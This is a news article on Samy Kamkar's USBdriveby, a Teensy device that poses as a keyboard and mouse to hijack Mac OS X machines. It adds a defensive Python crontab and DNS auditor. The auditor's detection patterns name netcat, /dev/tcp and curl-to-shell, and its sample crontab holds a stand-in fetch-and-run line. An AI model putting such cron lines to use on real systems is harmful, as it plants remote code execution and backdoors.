USBdriveby: Using a $20 Teensy 3.1 USB to hijack a Mac OS X PC

$20 Microcontroller Can Hijack Computers by Emulating Mouse and Keyboard #USBDriveby

Samy Kamkar, a security researcher, has found a security loophole in something most users won’t even bother securing. He took a Teensy 3.1, a USB-based microcontroller available for $20, and loaded it with enough software to emulate a keyboard and a mouse on whichever system it is connected to. Once connected, it can be used to carry out any operation on the target computer. Mind you, this isn’t a hack; it’s just taking advantage of a utility that we take for granted.

Blind Faith

The gadget, dubbed USBdriveby by Kamkar, leverages the fact that many systems blindly trust USB devices connected to them. Once the device is connected to a machine, it can be used to disable firewalls, download malware, change DNS settings or even create a backdoor on the system. Once the device has been disconnected, the victim machine remains under the attacker's command and control. And since both input devices (keyboard and mouse) were emulated, there is no way for the victim, however security conscious, to know how the machine got infected.

“When you normally plug in a mouse or keyboard into a machine, no authorization is required to begin using them,” the researcher explained. “The devices can simply begin typing and clicking. We exploit this fact by sending arbitrary keystrokes meant to launch specific applications (via Spotlight / Alfred / Quicksilver), permanently evade a local firewall (Little Snitch), install a reverse shell in crontab, and even modify DNS settings without any additional permissions.”
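A host-side check for two of the changes named in the quote above (a crontab entry and modified DNS settings), as an added example that is not from the article or from Kamkar's USBdriveby code. The patterns, the sample crontab and the allowed resolver range are constructed assumptions.

```python
import ipaddress
import re

# Heuristic patterns (assumptions for illustration, not a complete signature set)
# for cron commands that open a network connection from a shell or interpreter.
SUSPICIOUS = {
    "shell /dev/tcp redirection": re.compile(r"/dev/(tcp|udp)/"),
    "netcat invocation": re.compile(r"(^|[\s;|&/])(nc|ncat|netcat)\s"),
    "interpreter using sockets": re.compile(r"\b(perl|python[\d.]*|ruby|php)\b.*socket", re.I),
    "download piped to shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),
}

def audit_crontab(text):
    """Return (line_number, reason, command) for each suspicious cron command."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # "@reboot cmd" has one schedule field; standard entries have five.
        fields = 1 if line.startswith("@") else 5
        parts = line.split(None, fields)
        if len(parts) <= fields:
            continue  # environment assignment or malformed line
        for reason, pattern in SUSPICIOUS.items():
            if pattern.search(parts[-1]):
                findings.append((lineno, reason, parts[-1]))
    return findings

def audit_dns(resolvers, allowed_cidrs):
    """Return configured resolvers that fall outside the allowed networks."""
    networks = [ipaddress.ip_network(c) for c in allowed_cidrs]
    unexpected = []
    for resolver in resolvers:
        try:
            ok = any(ipaddress.ip_address(resolver) in net for net in networks)
        except ValueError:
            ok = False  # unparsable entries are flagged too
        if not ok:
            unexpected.append(resolver)
    return unexpected

# Constructed sample input, not captured from a real host.
SAMPLE_CRONTAB = """\
MAILTO=""
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * perl -MIO::Socket -e '<body elided>'
@reboot curl -s http://updates.example.invalid/x | sh
"""
```

Running `audit_crontab(SAMPLE_CRONTAB)` flags lines 3 and 4 of the sample and leaves the backup job alone; `audit_dns` takes the resolver list read from the host and the CIDR ranges the organisation expects.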

Systems vulnerable

Kamkar carried out his research on Mac OS X and found that he could emulate either the mouse or the keyboard and get the system to do what he wished. Kamkar says that if the emulator works on Mac OS X, it should work on both Windows and Linux easily, given the resources Apple puts into securing Mac OS X. The source code for the microcontroller and the various operations performed by USBdriveby has been made available and can be downloaded from GitHub. These types of attacks are not new, and there is reason to believe that the NSA has already been using such devices as backdoors.

Previous USB Hacks

Earlier this year, at the Black Hat security conference, researchers at Germany-based SRLabs demonstrated that a USB device’s firmware can be reprogrammed for malicious purposes. They called the attack “BadUSB.” The method developed was much more sophisticated compared to USBdriveby. However, they did not release the source code until September. USBdriveby, however, is a completely different approach, as it only emulates hardware, leaving the actual hacking up to the individual.
